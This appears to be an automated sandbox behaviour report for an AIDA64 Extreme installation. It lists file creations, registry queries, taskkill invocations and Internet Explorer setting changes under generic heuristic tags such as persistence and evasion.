File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-EPEJP.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\CUESDK_2015.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-1VQE0.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-GI6FB.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-AOQ0E.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida_icons2k.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\storelibir.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-6ESLM.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\INF\c_display.PNF C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC281.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\vccorlib140.dll_x86 C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC769.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF3A81FCB2D6CFEEF8.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File created C:\Windows\SystemTemp\~DFA639CBA87617C157.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC768.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\concrt140.dll_x64 C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\msvcp140.dll_x64 C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\vcruntime140.dll_x86 C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\INF\c_media.PNF C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File created C:\Windows\SystemTemp\~DF4E473C5A83EEF2CC.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF0FCCF5526EEA62A4.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\msvcp140.dll_x86 C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\INF\c_processor.PNF C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\vccorlib140.dll_x64 C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF989643022A5A3F31.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\msvcp140_1.dll_x86 C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF3D3545455E5026FD.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC6BB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\vcruntime140.dll_x64 C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\INF\c_monitor.PNF C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
File created C:\Windows\SystemTemp\~DFD36974B6417142C7.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFAFFD76C433B30C35.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC5B1.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF20299BB5AFFBD1BE.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF76911CEE38B4ABAC.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF5D9E4EA93CB066E3.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF0AB0F3D92FF57F74.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF878F8660D1F829DC.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setupact.log C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF998870C7C2A68E2D.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\concrt140.dll_x86 C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\msvcp140_1.dll_x64 C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\CacheSize.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF09A4447336A4E044.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\INF\c_volume.PNF C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
File created C:\Windows\INF\c_diskdrive.PNF C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
File opened for modification C:\Windows\Installer\MSIC3BB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC487.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\CacheSize.txt C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

persistence privilege_escalation

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\System32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\System32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\System32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LocationInformation C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Address C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Address C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LocationInformation C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Driver C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Driver C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName C:\Windows\explorer.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SYSTEM32\MsiExec.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SYSTEM32\MsiExec.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SYSTEM32\MsiExec.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SYSTEM32\MsiExec.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\DESCRIPTION\System\BIOS C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
